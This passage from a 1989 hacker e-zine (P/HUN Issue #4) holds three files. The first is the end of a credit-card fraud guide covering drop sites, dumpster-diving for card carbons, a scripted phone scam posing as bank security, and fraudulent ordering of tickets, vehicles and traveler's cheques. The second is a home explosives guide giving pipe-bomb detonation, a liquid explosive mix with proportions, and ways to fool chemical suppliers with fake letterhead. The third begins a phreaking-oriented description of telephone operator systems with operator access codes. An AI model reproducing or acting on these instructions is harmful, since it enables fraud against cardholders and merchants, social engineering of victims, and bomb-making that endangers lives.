THE CREDIT CARD IS VALID, AND THAT IT HAS ENOUGH CREDIT TO PAY FOR THE

MERCHANDISE YOU ARE PURCHASING. * My suggestion, however, is that you give them

the phone number of a pay phone near your house. [ Or, if you want to REALLY

make sure things go smoothly, give them the number of a direct dial VMB local

to the shipping address. ] If they want to call you back, FINE. Ask them to do

so between the hours of X pm and Y pm. And, just pitch tent at the phone for a

few hours a night. No problem. They will almost always call right back, since

they don't want to inconvenience their customer who happens to be buying $6,000

worth of computers at the time. Understand?



SECOND- Where should I ask have them ship it to, you ask? Fret not, my little

friend in carding. Before you call and order your things, first go out and find

an abandoned house. These still work best. Either one that has been moved out

of, and no one has moved into yet. Or, if you can, find one that is REALLY

abandoned. (BUT MAKE SURE IT HAS A STREET ADDRESS THAT THE POSTMAN OR UPS MAN

CAN FIND!) Jot down this address. This is referred to as a drop site.

[ Ed. Note: if, and I say IF you can rent a mailbox, do so. Make sure they sign

for everything (UPS, etc) and bring some FAKE ID with you to open it up. Most

of the time, they will give you hastle, and verify EVERYTHING you give them. So

it is really not that easy to get one of these. At least try, though. ] OKAY,

give this address to the man or lady who is taking your order. Tell them this

is where you live. REMEMBER, they can not verify that you don't live there for

quite a while. They will send everything there. When the shipment comes (either

Overnight, Second Day, or whenever), pick it up (CASUALLY) and stroll home to

open your package. If it does not come, or if the salesperson gives you

trouble, don't worry. If it didn't come, it is because 1) It got intercepted by

the feds or 2) The company didn't process it because they did actually try to

verify your address, name, and phone number, thus delaying your shipment, but

saving themselves a lot of money. Just try another store until you find some

place that is easy to buy from.



THIRD- I suggest that you do not furnish your household with carded items. It

is just not wise. Get a few things, if you like, and wait a little while. Sit

tight. When things cool down, you might want to get some more things. REMEMBER-

all things are good in proportion, but when you get out of that proportion (ie,

get greedy and order a new house) you will most definately get caught sometime

or another. Patience is the carder's best friend. (along, of course, with the

VISA formula... hehe)



FOURTH- You have all heard it before. DON'T DISPLAY YOUR SPEICAL TALENT AT

SCHOOL, PARTIES, OR SOCIAL EVENTS. Not even to your best friends. ESPECIALLY

not to your best friends. They are the ones most likely to brag about you and

spread the word. This is the farthest thing from what you want. Keep it to

yourself, and if you must tell someone about it, either call Phone Sex, a

Bridge, or an Alaskan Operator. Those are your only choices, as no other carder

or phreak wants to hear about how good you actually are.



FIFTH- I wouldn't advise making a bussiness out of this, either. Sure, if you

want to get a few dollars for things you order (and that you don't want

anymore) sell it and keep the money. But its purely asinine to take "orders"

from people for money. And even if you don't want money. Keep in mind that

Credit Fraud IS a felony, and getting caught violating US Federal Laws is not a

fun experience to go through. Do you want to go to jail for 10 years, and never

again be able to get a good job because Joey down the street wanted to pay $10

for a new skateboard that retails for $75?? Thats what I thought. Your whole

goal in life, as long as you participate in the Underground Arts, is to keep a

low profile.



VIII. Getting Credit Car$s



There are a number of ways through which you can get credit cards.



FIRST- Go trashing. That is, go in back of a bank, department store (make

sure it is not in a mall!), or other store which accepts credit cards. When the

coast is clear, jump in their trash bin. Rummage around a bit. Having a look

out might prove to be wise. What you are looking for are carbons - the carbon

paper which the salesperson throws out after a purchase has been made. Remember

these? It is the device that guarentees you (a legit customer) get a receipt of

your credit card purchase, and also that the store gets a copy for record

keeping. Once you find these, (and making sure you don't rip them) put them in

a bag, pocket, whatever, and get somewhere safe. (home?) Hold them up to the

light, and copy down everything you think is important. Card Number, expiration

date, name, address, bank name, etc... Then BURN the carbons. This destroys all

evidence that you ever had them. From here, you are set. Order away!



SECOND- If you have a friend that works in a store which performs credit

card transactions, you might save yourself the trouble of banana peals on your

head and ask him/her if they might not mind slipping the carbons into a bag

after they ring up a sale. (or have them copy everything down for you.)



THIRD- You might try bullshitting people and getting their cards. You have to

be VERY good, and the person has to be VERY stupid for this to work. In my

mind, it is a waste of time, and almost never works. (Because people where I

live are smart, of course..) I am presenting this to you in case you live in a

society of morons. Exploit every area that you possibly can. The conversation

might go something like this:



YOU: "Hello, Mrs. Davis? This is Mr. Off from Security down at Citibank. We

have had a computer breakdown and no more of your VISA transactions can be

processed since we lost your credit card number. Do you think that you can give

me your number again, so I can re-enter it right now?"




Mrs. Davis: "Wait a minute, who is this again?"



YOU: "My name is Jack Off and I am from Citibank Security. (Explain whole

situation to her again )"




Mrs. Davis: "I don't know about this. Can I call you back at a number?"



YOU: "Sure. That's no problem. I understand your reluctance. Here... call me at

my office. Its 555-1212 (pay phone, loop, or bridge which you are at)"




Mrs. Davis: "Ok, bye!"



<CLICK>

<RING...>

YOU: "Hello? This is Jack Off's office, Citibank Security, may I help you?"



Mrs. Davis: "Oh, good. I was afraid you were a phony. Ok, my VISA is xxxx-

xxx-xxx-xxx... "




YOU: "Thank you. We will try to restore your credit limit as soon as possible.

Until then, please refrain from trying to purchase merchandise on your Citibank

Visa Card. Goodbye."




<CLICK>



Neat, huh?



FOURTH- If are a really advanced Carder, you can get fancy and use a credit

card formula. Great, you're saying to yourself. GIMME GIMME GIMME! Not so

quick. Although several do exist, and I do have a couple of them, I am in a

situation in which I am unable to reveal it. If you are particularly smart and

intelligent, you can develope it yourself. Actually, it is not that hard if you

have the means. MAYBE if you are good at math....



FIFTH- You may try to get credit cards from other people. (friends?) I

stronly recommend against this. Usually the cards you get from other people

have usually already been used and are either being watched or are already

dead.



SIXTH- If you have access to a Credit Union, you can call and "pull" someone

else's account. (For instance, if you know someone's name and address, or

social security, you can take a look at all of their loans and credit cards. )







IX. Advanced "Carding" Techniques



Please, people, I beg of you -- If you have not been carding for a year or

two (AT LEAST) do not read this information. It will only confuse you, and even

if you understand it, it will not work as it should unless you have the

experience you are lacking. So sit tight and practice with parts I-VIII.

PLEASE!



If, perchance, you happen to have the experience necessary to read on,

then enjoy this. The following are simply a few details, hints, etc, that I

just left out of the original manuscript due to my horrendous memory. Add to it

if you like, and pass it a long. We all need to help each other if we are going

to survive. Also, the following are in no particular order except that which

they come to my head.



1) For a drop site, you can try to get fancy if need be. I have heard of empty

military huts being used as well as empty condos, empty houses whose owners are

on vacation, and about a zillion other stories. If you think you have come

across something new, think a plan up, think it over, and think it over again.

Make sure you have every step down so when you order, pick up, and make your

escape, there are no problems. Think about it . . . what harm does it do to

spend an hour making sure you didn't overlook something. It is a lot better

than going there and getting caught.



2) Sometimes the places you order from will have an online account with a

credit record bereau. (Such as TRW, CBI or Transunion) The horrifying fact is

that they can verify ONLINE ANY information that you give them. So, you're

busted, right? Wrong . . .

If this happens, there is nothing you can do unless you have a lot of power

with phones. Chances are, you don't. So play it cool and give an excuse to get

off the phone. Just try somewhere else. Also, if you don't do this right, you

will probably kill the credit card.





X. Credit Unions



Credit Unions basically are databases that hold information of its

members. When you apply for a credit card, I think that the application to be a

member of a Credit Union is presented also. Since almost EVERY person who owns

a credit card has personal information in at least one of these services, then

there is no fooling he who has access to these services. Many times in your

carding career, you will run into a bussiness who has an online connection to

such unions. If you try to present false information they will catch you and

follow up with the appropriate actions. (That is, report the credit card you

said is yours as dead, call the authorities, etc, etc.)

Two of the major Credit Bureaus in the United States are TRW and CBI. As

these two services hold large bases of information on its members (ie, every

credit card holder in America), many unauthorized personnel often wish to gain

access to them. They are accessed through a computer by calling a Bureau port

and entering authorization passwords.

For CBI, the passwords are in the format of nnnllnnn-**, where n=a number

0-9; where l=a letter from a-z; and where *=any character.

For TRW, the passwords are in the form of lllnnnnnnnlnl. (using the same

key as CBI.)

As you can see from the length and complexity of these passwords, it is

literally impossible to hack them. (ie, hack in the sense guess them.) So you

are probably wondering how unauthorized persons gain access, huh? Well, we

either have inside information or we go trashing. Thats it.

Right now, however, I am not going to go any further into the subject of

credit unions. Be aware that they exist, and they can help you as well as hurt

you if you don't know what you are doing. At a later date I plan on devoting an

entire file to the subject of credit unions, as I haven't seen an up-to-date

file in years.







Thats about all. I wish you all good luck, and may your adventures be safe and

fun-filled. And if I EVER catch any of you giving out the credit formula (once

you discover it..) I am going to personally fly over and kick your ass.

(remember- I have carded tickets around the country many times. There is

nothing to stop me from visiting YOUR town.. hahaha)



One final note -- VISA is planning on changing their credit formula within a

few years. So if you happen to be reading this many a year down the line, you

will most likely discover that some of this is no longer valid. DONT BLAME ME.

It was valid at the time when I compiled it.











APPENDIX A

----------





Credit Card Formats

-------------------



American Express -- xxxx xxxxxx xxxxx

\/ \/ \/

/ | \

/ | \

4 digits 6 digits 5 digits



VISA -- xxxx xxxx xxxx xxxx

\_________________/

4 digits each group



OR



-- xxxx xxx xxx xxx

\/ \_________/

/ 3 digits each

4 digits





Mastercard -- xxxx xxxx xxxx xxxx

\_________________/

4 digits each group





Discover -- xxxx xxxx xxxx xxxx

\_________________/

4 digits each group.









APPENDIX B

----------



Credit Verifiers





1800-554-2265. Use '#' (pound) as control key.



Card Type: 10 = Mastercard

20 = Visa



Bank Identification: 1067



Merchant Number(s): 1411

52



IDEA:: You all know those sex lines (like 800-666-LUST), well they verify your

credit card before they let you listen. You might try calling one of these and

using it for a while if you have nothing else.











APPENDIX C

----------





Other Things to Do



1] Plane Tickets



It is relatively easy to order plane tickets using a credit card nowadays.

And, for convenience, you can order over the phone. Well, look up your favorite

airline, call them, and present them with the situation. You would like 2

executive class tickets to Florida [ Ed. Note - If you live in Florida, make it

a trip to California ] round trip to be billed to your Visa Credit Card. Oh

sure, maam. My credit card number is <blank>. My expiration date is <blank>. My

Name is Joe Schmoe. I live at 223 Hard On Lane, Pubic Hair, PA. Oh, and maam,

could you PLEEAZE hold the tickets at the airport for me. I will present some

identification to pick them up there. Thank you.

It is relatively easy to do this. But, there are a few catches.



A.) Do NOT stay for any long period of time at any one place. After

few days, the airline will catch on to what you have done. My

suggestion is that you stay for only about 2 to 3 days. Or, if

you really want to stay for a long time, get a one way ticket to

wherever it is that you would like to go to. Stay however long

you want to stay and take another 1 way ticket home.



B.) If you plan on traveling around the country, catch one way

tickets around from place to place. And please, USE DIFFERENT

AIRLINES!



2] Motorcycles



Again, you would be surprised at the amount of work (or lack of it)

required to aquire motorcycles on other people's credit cards. I believe you

can all see the advantages, so let us get down to the procedure. First, set up

an order under a corporate account. You can find these sometimes if you work in

a store that would use such cards. (Look over shoulders) Well, I will leave to

you the methods to come upon corporate account cards. Once you have them,

finish the procedure. Step 2 is to send an "employee" (yourself or a stupid

friend) to pick it up. Bring proper identification that was issued from the

corporation. (I suggest making your own -- Not very hard). Offer a Voice Mail

Box as your bussiness number. It is very common for a high level employee to be

absent from his desk. Use your imagination for the rest, and tidy it up to

perfect it.



3] Travelers Cheques



OKAY, I will admit this is getting out of hand, but what the hell -- For

those of you very daring and in possession of a very good form of false

identification (Birth Certificate?), you can easily order some American Express

Traveler's Cheques for your travels around the world. The number to call is

1-800-777-7337. Using your American Express Credit Card, order some of these

"babies" in another name. (For a gift..) Have them delivered as you deem

appropriate. Enjoy them thouroughly.

[ Ed. Note: This number is active as of 12-20-88. I don't know if these offer

this service year round. Find out! ]





=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



P/HUN Issue #4, Volume 2: Phile 5 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Introduction to Home Explosive Manufacture



Written by:

Franz Liszt



I do not assume any responsibility in

how this information is used; legally or illegally

and I do not recommend that one manufacture

explosives without a B.A.T.F. licence.

Do not worry about possessing this information

because the F.O.I.A. allows you to have any

information such as this, so as long as it is not

classified data.



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-





INTRODUCTION



I know of all of you phreaks, hackers, etc. out there are interested

in any kind of information that the public usually does not publicize.

This is why I have wrote this phile - to inform you. I also feel that

I should volunteer this information to PHUN because I have obtained

much useful information from that publication and others. I think that

anyone with good knowledge should teach it to their phriends because

we are becoming a dumb race due to the enlightened attitude of the

population from influences such as yuppies, geeks, skateboard freaks,

subliminal brainwashing, bloated bureaucrats, and lazy legislatures.

We must try to become free THINKING people so our brains do not atrophy.

Don't let any of the above influences brainwash you into a quivering

pathetic mass of gelatin like so many people are now. Use any

information from philes you read to benefit you and rid of the

bastards out to get you!!!



At any rate, lets get on with it...The field of explosives is a very

interesting one to study. It can be fun, and it can be dangerous at

the same time. One must exercise great caution when assembling any

type of explosive device since most are sensitive to jarring, rough

handling, friction, static, and other influences. THIS INCLUDES

MIXING ANY CHEMICALS OR EXPLOSIVES TOGETHER.



DO NOT EVER MIX ANY EXPLOSIVE FORMULA TOGETHER WITH

ANOTHER UNLESS YOU WANT YOUR BODY EVAPORATED OR AT THE

LEAST, LIMBS REMOVED OR EYES BLINDED.



If you are uncertain of an explosive formula you have found in an

anarchist book or on some BBS, don't make it. As a matter of fact,

don't trust to many philes you see and only believe the reputable

books such as "The Poor Man's James Bond I & II", the "CIA Black

Books"
, and army field manuals. I also ran across some new books

called "Kitchen Improvised Explosives", which can be had from a

radical book company called LOOMPANICS UNLIMITED P.O. Box 1197, Port

Townsend, WA 98368. They are also a very good source for information

but the procedures outlined require more lab apparatus.



It is also a good idea to take some chemistry classes. Take advantage

of chemistry in high school if you are still there. You can learn a lot

if you pay attention and read ahead of your teacher. Try to get on his

good side so he will let you perform "extracurricul

  
ar activities" in

the school lab. You can learn a lot by doing experiments and you can

also have access to chemicals and expensive lab ware which I find is

necessary to safely make many explosive compounds. If you are out of

school, and you want to get serious about explosives, take a chemistry

class or two at your local college. Call your local Technical school

if you have one and ask them if they are offering any miners blasting

seminars in the future (yes these do exist). If not, call your local

bureau of mines and inquire. Some "social engineering" may be

necessary when talking to them though.



One should at least go to the local library and look for explosive

books and check the encyclopedias for "scratch the surface"

information. If you know a little about chemistry, get the book "The

Chemistry of Powder and Explosives" by Tenny L. Davis. You can obtain

journal footnotes from such books and do further research in "Chemical

Abstracts" and "The Journal of the American Chemical Society" along

with many others; all obtainable from a halfway decent college

library in the reference section.

__________________________________________



EXPLOSIVE TYPES



Basically, there are two types - low and high. The low explosives are

chemical compounds such as black powder, flash powder, match head

powder, etc. These compounds do not necessarily explode but have more

of a burning characteristic. They will propagate into an explosion

when confined in a solid container such as a "pipe-bomb" so the gases

they produce can expand forcefully instead of burning away in the open

air. Black powder for instance detonates at about 300 meters per

second, which roughly means if you make a "train" or line of it 300

meters long, and detonate it with a blasting cap at one end of the

train, the chain reaction and decomposition of the whole train will

take one second. And black powder releases about 12000 PSI when confined

in nominal 2" water pipe with a wall thickness of 1/8" and detonated

with a No. 8 blasting cap (this is a standard size blasting cap that

coal miners and the military uses). Notice I said that it must be

detonated. You cannot just stick a wick in the pipe and light it because

more that likely it will only burn and make a big fire. I will talk more

about detonation later. 2,4,6-Trinitrotoluene (TNT) detonates at about

7400 meters per second when cast loaded into a container. TNT is a high

explosive and its subsequential confinement in a container is not as

important as with low explosives. High explosives are chemical compounds

that will explode regardless of containment. You could lay a big pile

of TNT on the ground, lay a blasting cap on top of it, light the wick,

and the whole mess will still explode. High explosives undergo a

chemical reaction of decomposition in less that a millionth of a second.

All of the energy is released instantaneously. Low explosives, such as

black powder have more of a burning characteristic. High explosives not

only detonate much quicker, but also release more energy. TNT releases

about 4.24 million PSI and the military explosive C-4 releases about 5.7

million PSI and detonates at 8100 meters per second!

_____________________________________________



DETONATION



Most high explosives are not capable of detonating without being set off

or initiated with another explosion. This is done with the help of those

neat little goodies called blasting caps. They contain medium to high

explosives also, but their chemical composition(s) are unstable and will

detonate when fire or spark is introduced to them. You may ask then why

not just use blasting cap explosive instead of regular high explosives.

Well, blasting cap materials are VERY sensitive to shock, friction, etc.

and are also not as efficient as regular high explosives.



Anyway, the blasting cap is usually placed in the high explosive in a

well dug in the high explosive. An example would be like this in a pipe

bomb:



_______ Blasting cap

/

!-- * --!

! * !

! * !

! !_____ Pipe bomb

! !

! !

! !

! !

!-------!





(please excuse the ASCII drawing)





When the cap is detonated, the explosive wave it generates is directed

downward and detonates the high explosive in a "chain reaction".

This is why the bottom of the explosive container should be placed on

the target. The peak of the propagated explosive wave will be at the

bottom of the explosive charge...



At any rate, I do not suggest that one attempts to manufacture blasting

caps without knowledge in explosive handling safety and also the proper

laboratory procedures when making the blasting cap explosive itself.



I have made over 300 blasting caps without an accident. I also take very

careful precautions before assembling the caps and I have a properly

equipped laboratory to synthesize the explosive material. I always work

in a controlled environment with accurate measuring equipment for any

explosive experiment I partake in. It is necessary to work under a lab

fume hood to vent any toxic gases produced during experiments. It is also

a good idea to ground yourself and your work area so static electricity

doesn't wreak havoc and blow your chemical up in your face.



IT IS GOSPEL TO FOLLOW DIRECTIONS WHEN DOING ANY EXPERIMENT. ESPECIALLY

WITH EXPLOSIVES. Outline your explosive production procedure before

proceeding with any experiment.



Refer to literature at your local library concerning blasting cap mfg.

before you attempt to make them. The book I mentioned "The Chemistry of

Powder and Explosives" covers the subject very well. There are also some

good books available from Paladin Press on explosive manufacture and the

blasting cap manufacture.



It is possible to create blasting caps in a "kitchen" type environment,

but I do not recommend it because of the dangers involved when making

the explosive components. Many of the starting materials are corrosive

and toxic. Blasting cap explosives are also VERY sensitive. More so than

nitroglycerine in some cases. For instance, Lead azide, the most popular

blasting cap explosive today, when synthesized improperly, can grow into

crystals in the starting agent solution and spontaneously explode just

because of improper stirring and/or cooling. Very easy mistake to do.

Mercury fulminate, one of the cheapest and easiest to synthesize,

produces toxic gases when synthesizing. When the finished product is dry,

it is sensitive to a 2cm drop of a 5 lb. weight. THAT IS SENSITIVE!



ALTERNATIVE:



After all of this negative talk of blasting caps leaves much to be

desired. But there is an alternative to using blasting caps if one has

access to firecrackers such as M-80's, M-100's, M-200's, cherry bombs,

Maroons, etc. These little bombs themselves are sufficient enough to

detonate many high explosives. All of the "nitro" compounds will

detonate with one of these firecrackers. Their use would be the same

as the blasting cap - inserted in a little "well" made in the explosive

charge, sealing off, and their fuse ignited accordingly.



____________________________________________



MAIN EXPLOSIVE CHARGE



This is the big working explosive. The one that does the big damage.

It should be handled with the same precautions as blasting caps, but

in many cases, can be as safe as handling fertilizer.



Some examples of common high explosives are ditching dynamite, gelatin

dynamite, ANFO (ammonium nitrate fertilizer/fuel oil), TNT, PETN, RDX,

military plastics, and even smokeless powder.



These explosives are easily made in some cases, and dangerous at the

same time. Since it is beyond the scope of this article, I must refer

everybody to your local library, the books I have mentioned, or most of

the "unusual" book publishers. Just do research in all possible material

before grabbing a book and running out, buying the chemicals, and

throwing stuff together. Get yourself a few of the "black-books", the

"Poor Man's James Bond volumes", etc. and compare them with each other.

Don't trust any unheard of publishers or books.



It goes the same for the main charge; if one doesn't have access to the

necessary chemicals, one can improvise. For instance the smokeless

powders available from gunsmith's and reloading shops contain high-

explosives such as nitrocellulose and nitroglycerine. They are called

double based propellants. An example is made by Hercules Powder co.

called "Bullseye" pistol propellant. It contains:



48% Nitroglycerine

50% Nitrocellulose

2% Flash suppressants, stabilizers, etc.



It will detonate at about 7200 meters/sec. when firmly packed in 2 inch

wide, schedule 40 hardened steel pipe. It detonates with 2,000,000 PSI

also. This should suffice for many operations.



I myself placed 1 1/2 pounds of the powder in a three pound coffee can

and detonated it with an M-80 firecracker and it left a ditch in hard

packed clay-soil about 2 feet deep and 3 feet wide! It was simply placed

on the ground with the bottom of the can down. The blast was plainly

heard indoors 1 mile away! Please if you attempt such a blast, make sure

you give yourself ample time to get at least 300 yards away and don't

detonate it near any buildings within 50-75 yards because the air-blast

will possibly crack their windows. I usually use a lit cigarette placed

on the fuse of the cap or firecracker. This will give you about 10 min.

delay depending on the temperature and wind conditions. Packing the

cigarette will give a longer delay.



Another good explosive, if you prefer a liquid explosive is a mixture of

Nitromethane and amine based compounds such as aniline, ethylenediamine,

and for anyone that can't obtain the above chemicals, regular household

ammonia will work as long as it is the clear non-detergent brand.

The Nitromethane can be had from any "speed-shop" or race car parts

supplier. It usually runs about $20 to $30 bucks a gallon. Simply mix the

two liquids: 96% nitromethane and 4% ammonia (by weight). This explosive

has the disadvantage of being somewhat insensitive. You need at least

a No. 8 blasting cap to detonate it. It only need be confined in any kind

of capped bottle and the blasting cap inserted in the neck. The blasting

cap should be dipped in wax before immersion in the liquid explosive.

Some Nitromethane manufactures add a indicator dye that turns purple when

the liquid becomes dangerously explosive. So, when you mix your ammonia

with the Nitromethane and the solution turns purple, you know that you

have done well!

________________________________________



OBTAINING CHEMICALS AND LAB WARE



Getting your chemicals and lab ware can present a problem in some cases.

In order to order laboratory chemicals, one must be a company, or

try to prove that you are a company. Most suppliers don't like to sell

to individuals in fear of clandestine drug and explosive manufacture.

Those same companies also can be fooled easily with homemade letterhead

also. For those of you with laser printers, the sky is the limit. If

you don't have a laser printer, you should visit your local print shop.

First, simply call the chemical companies and request for a catalog.

You must get on the phone and say something on the order of:

"Hello...this is C.B.G. Water Treatment Corp., may I speak to sales

please? I would like to order your most recent catalog..."

When you get catalogs from different companies, compare their prices

and shipping charges. Make sure you don't order a set of chemicals

where it is obvious you are making something you don't want them to know

you are making. A suspicious order would be Nitric & Sulfuric acid and

glycerine. This would be obvious that you are going to produce nitro-

glycerine. Spread out your orders and orders between companies. Also

be careful of watched chemicals. The drug enforcement agency watches

certain orders for certain chemicals. They usually say something on the

order of under the listing of the chemical entry in the catalog "only

sold to established institutions." It just so happens that certain

explosive synthesis requires the chemicals as some illicit drug

production.



Go to your local library in the reference section. Get the THOMAS REGISTER

It is a set of books that list addresses of industrial suppliers. Look

under chemicals for addresses.



I do know of one company called Emerald City Chemical in Washington.

They only require that you be at least 18 years of age. No letterhead

necessary.



I suggest staying away from Fisher Scientific, Seargent Welch, Sigma &

Aldrich Chemical companies because they are either expensive, only sell

to schools, or watch for illegal or suspicious chemical orders. I noticed

that a lot of you phreaks out there live in New York; so stay away from

City Chemical Co. I was informed that they closely watch their customers

also.



Don't make some letterhead for Jo Blow's Sewing Machine Repair and order

complicated chemicals like 2,3,7,8-tetrachlorodibenzo-p-dioxin, bis-2-

ethylhexy-diadipate, 3,4-diaminofurazain, or pharmecitucal type chemicals

or any kind of chemical that looks like a foreign language. It looks

VERY suspicious and your address will be forwarded to your local FBI or

DEA office pronto. Nowadays you really got to watch what you order

thanks to our bleeding heart liberals worrying about kids blowing their

hands off trying to make firecrackers, or folks making controlled drugs in

their basements.

________________________________________



CONCLUSION



I hope this information is of some use to you. Just remember that it is

a federal offense to manufacture and transport explosives or explosive

devices without a B.A.T.F. licence.



Also keep in mind that if you do decide to make yourself some bombs,

just remember NOT TO TELL ANYONE! If you tell someone, that is just the

added risk of getting caught because your "buddie" was a stool pigeon.

BELIEVE ME - chances are if you tell someone, others will find out from

gossip and you will be the alias "mad bomber" of your town. If someone

happens to see any lab equipment or if your neighbors smell any strange

chemical smells around your home, they might even think you are making

drugs, so be careful. If you tell your friends of your activities, don't

be surprised if you see a gunmetal grey Dodge Diplomat with a dozen

antennas protruding from it sitting across the street with a guy in it

watching your house with a spotting scope...



DO NOT SELL explosives to ANYONE without a licence. If they get caught,

the feds will plea-bargan with them and find out where they got the

bombs and of course your buddie will tell them so he gets a reduced

sentence. They WILL get a search warrant with no problem and proceed

to ransack your premises. I know of a person that was in a similar

situation. He didn't have any explosives in his house, but they seized

his chemicals because of the complaint filed. Subsequently, the feds

kept up pretty good surveillance on him for quite a while.



Use this information with caution and don't blow yourself up!



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



Feb. 20, 1989



Brought to you by

Franz Liszt,

and The Manipulators...



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



NOTICE: THIS FILE MAY ALSO BE RELEASED IN A 'YET TO COME' NEWSLETTER.

*************************************************************************

* * P/HUN Issue #4, Volume 2: Phile 6 of 11 * *

* * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * *

* * * *

* * Traffic Service Position System(TSPS) No. 1B * *

* * * *

* * Call Processing and Explanation * *

* * Part One * *

* * * *

* ********************************************************************* *

* ********************************************************************* *

* * * *

* * - Coin Stations and ACTS * *

* * - Calling Card Service * *

* * and * *

* * - Billed Number Screening * *

* * - Busy Line Verification * *

* * * *

* ********************************************************************* *

* ********************************************************************* *

* * * *

* * Written By. . . Phelix the Hack * *

* * * *

* ********************************************************************* *

* ********************************************************************* *

* * * *

* * The author hereby grants permission to reproduce, redistribute * *

* * or include this file in your g-file section, electronic or print * *

* * newsletter, or any other form of transmission of your choice, * *

* * pending the fact that it is kept intact and in its entirety, * *

* * with no additions, alterations or deletions of any of the info * *

* * included below. * *

* * * *

* * Phelix the Hack Feb. 1989 * *

* * * *

* ********************************************************************* *

*************************************************************************





1.0 Introduction

================



The purpose of this file is discuss and describe the general system

architecture and processing of certain calls handled in a Traffic Service

Position System (TSPS) No. 1B office. From here after, any reference to the

anacronym - TSPS, will be used to describe the Traffic Service Position System

1B. Wheras TSPS processes a wide variety of call types (listed below), this

file will deal primarily with only a few types which I feel to be of special

interest and importance to the phreak/hack community. Future files on TSPS

will continue to expand upon the information presented here, and will discuss

additional call types and processing.



The types of calls, elected to be discussed in this file will fall primarily

within the three following categories:



1) Coin Station Calls (Payphone) and ACTS call processing.

2) Calling Card Service and Billed Number Screening.

3) Busy Line Verification







2.0 Table of Contents

======================



Section Description

======= ===========

3 Anacronyms and Abbreviations used throughout this file.

4 General overview of call types.

5 General call processing for Coin and CC Services.

6 Coin Station.

7 Calling Card Service.

8 Busy Line Verification

9 Conclusion : Acknowledgements and References.









3.0 Anacronyms and Abbreviations

=================================



The following is a list of anacronyms and abbreviations commonly used

throughout this file. Due to the large number of times each appears, from

this point on the abbreviations will be used the majority of the time.



- TSPS - Traffic Service Position System

- ANI - Automatic Number Identification

- ANIF - ANI Failure

- ONI - Operator Number Identification

- H/M - Hotel/Motel

- DLS - Dial Line Service

- ACTS - Automated Coin Toll Service

- CCS - Calling Card Service

- BNS - Billed Number Screening

- OST - Originating Station Treatment

- SOST - Special Operator Service Treatment

- OPCR - Operator Actions Program

- RQS - Rate Quote System

- PTS - Position and Trunk Scanner

- RTA - Remote Trunk Arrangement

- DDD - Direct Distance Dialed

- AMA - Automatic Message Accounting

- CAMA - Centralized Message Accounting

- RBOC - Regional Bell Operating Company

- MF - Multi-Frequency

- DTMF - Dual Tone Multi-Frequency

- CDA - Coin Detection and Announcement

- SSAS - Station Signaling and Announcement Subsystem

- SPC - Stored Program Control

- T&C - Time and Charge

- PIN - Personal Identification Number

- RAO - Revenue Accounting Office

- NPA - Numbering Plan Area

- CCIS - Common Channel Interoffice Signaling

- APF - All PINs Fail

- OTC - Operating Telephone Company

- ICVT - InComing Verification Trunk

- OGVT - OutGoing Verification Trunk

- INTT - Incoming No Test Trunks









4.0 General Overview of Call Types

==================================



All call processing can be broadly thought of as the processing of a service

request (by an operator or a customer) thru connection, talking state, and

disconnection. Call types can be classified into the following two major

groups: (Although no definite line can be drawn, in that the groups often

overlap each other.)



4.1 Customer Originated Calls

==============================



The first category of calls are those which can be classified as customer

originated. In an effort to keep with the three main types discussed here,

some of the call types listed will not be explained.



4.1.1) 1+ Calls

===============

- DDD calls

- Calls with ANIF or ONI

- H/M calls

- CAMA calls

- 900 Dial Line Service (DLS)..."Dial a Vote"

- NonCoin transfers from offices with out billing equipment

- Coin Calls...Discussed later in greater detail



4.1.2) 0+ Calls

================

- Calling Card Service (CCS) Calls

- Billed Number Screening (BNS) Calls

- Originating Station Treatment (OST)..Third Party Billing, Collect..



4.1.3) 0- Calls

================

- OPCR ...Standard RBOC(or Equivalent) "0" operator



4.1.4) International Call Handling (ICH) ...Overseas Calls

===========================================================



4.1.5) Automated Quotation Service and H/M calls

=================================================





4.2 Operator Originated

========================



The second category of calls handled by TSPS are operator originated, and are

normally only initiated after a response to a customers request. These calls

are of a nature that require operator intervention in order to complete.

Examples: BLV/EMG INT, collect, third party billing...



4.2.1) Special Operator Service Traffic (SOST)

===============================================

- These include calls which must be transferred to a SOST switchboard

before they can be processed. Examples: Conferences, Appointment,

Mobile...



4.2.2) Delayed Calls

=====================



4.2.3) Operator Service Calls

==============================

- Customer/ Operator requested Rate and Route information ( RQS )



4.2.4) CAMA Transfer Calls

===========================

- Includes ANIF and ONI

- Transfers from areas without billing equipment



4.2.5) Busy Line Verification (BLV)

====================================

- The Busy Line Verification allows a TSPS operator to process a

customers request for a confirmation of a repeatedly busy line.

This service is used in conjunction with Emergency Interrupts and

will be discussed later in more detail.



4.2.6) Inward Calls

====================

- An inward call requires a TSPS operator to provide services which

the customers originating operator is not able to provide. Ex:

connection to a hard to reach number, BLV/EMG INT, CCS billing

validation...An inward call can be originated with any of the

following arrival codes:



- 121 : NonCoin code...standard inward connection

- 1150 : Coin code

- 1155 : Noncoin with T&C code

- 1160 : TSPS operator assisted inward CCS validation

- 1161 : Automated inward CCS validation for non TSPS operator

with DTMF touch tone signaling.

- 1162 : Automated inward CCS validation for non TSPS operator

with MF signaling.



- Examples of the above codes:

- KP+NPA+121+ST gets inward operator in NPA selected with only

INWD key illuminated, indicating call connected to position

in an inward call.



- KP+1161+ST gets automated CCS validation that responds to

DTMF tones.









5.0 General Call Processing for Coin Stations and CCS

======================================================



This section will deal with the processing that occurs during all customer

initiated calls, and can be applied to both Coin and CCS calls. The following

processes are presented in the order which they would normally be handled.



5.1) Trunk Seizure

===================

- When a local office seizes a trunk in response to a customer request

(i.e.- A customer has picked up the phone, placing it off-hook),

current flows thru the circuit, changing the state of the ferrods

(i.e.- scan points ) from an on-hook to an off-hook position. When

this change is determined by the PTS (Position and Trunk Scanner) at

the RTA (Remote Trunk Arrangement) to be an actual off-hook

transition, and not merely a flash (tapped switch hook), it is taken

as a request for service.



5.2) Digit Reception

=====================

- After a trunk is seized the local office sends the called and

calling number to the TSPS by means of MF pulsing. A Base Remote

